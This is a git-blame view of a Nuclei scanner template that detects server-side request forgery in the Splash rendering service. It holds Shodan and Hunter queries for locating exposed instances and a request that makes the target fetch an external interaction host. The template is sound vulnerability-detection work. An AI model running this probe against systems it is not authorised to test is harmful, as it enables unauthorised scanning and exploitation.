2023-03-16 11:59:02 +00:00
|
|
|
id: splash-render-ssrf
|
|
|
|
|
|
|
|
info:
|
2023-03-27 06:26:00 +00:00
|
|
|
name: Splash Render - SSRF
|
2023-03-16 11:59:02 +00:00
|
|
|
author: pwnhxl
|
|
|
|
severity: high
|
|
|
|
reference:
|
|
|
|
- https://github.com/scrapinghub/splash
|
2023-03-17 10:33:40 +00:00
|
|
|
- https://b1ngz.github.io/splash-ssrf-to-get-server-root-privilege/
|
2023-03-16 11:59:02 +00:00
|
|
|
metadata:
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2023-10-14 11:27:55 +00:00
|
|
|
max-request: 1
|
2023-03-16 23:00:41 +00:00
|
|
|
shodan-query: title:"Splash"
|
2023-03-16 11:59:02 +00:00
|
|
|
hunter-query: web.title="Splash" && header="TwistedWeb"
|
2023-03-27 06:26:00 +00:00
|
|
|
tags: splash,ssrf,oast,oss
|
2023-03-16 11:59:02 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2023-03-16 23:00:41 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
2023-03-27 06:26:00 +00:00
|
|
|
- "{{BaseURL}}/render.html?url=https://oast.live"
|
2023-03-16 11:59:02 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2023-03-21 05:38:50 +00:00
|
|
|
part: body
|
2023-03-16 11:59:02 +00:00
|
|
|
words:
|
2023-03-27 06:26:00 +00:00
|
|
|
- 'Interactsh Server'
|
2023-03-16 11:59:02 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-10-20 11:41:13 +00:00
|
|
|
|
|
|
|
# digest: 490a004630440220206aad931691b60fd9a893518d3591b055bd1ef3b7fd08d2440202ebd27a14ea022015f1d33232c0b8efd66da49f4563d5394f5c8520d37a4c178cca6be0654bbf8f:922c64590222798bb761d5b6d8e72950
|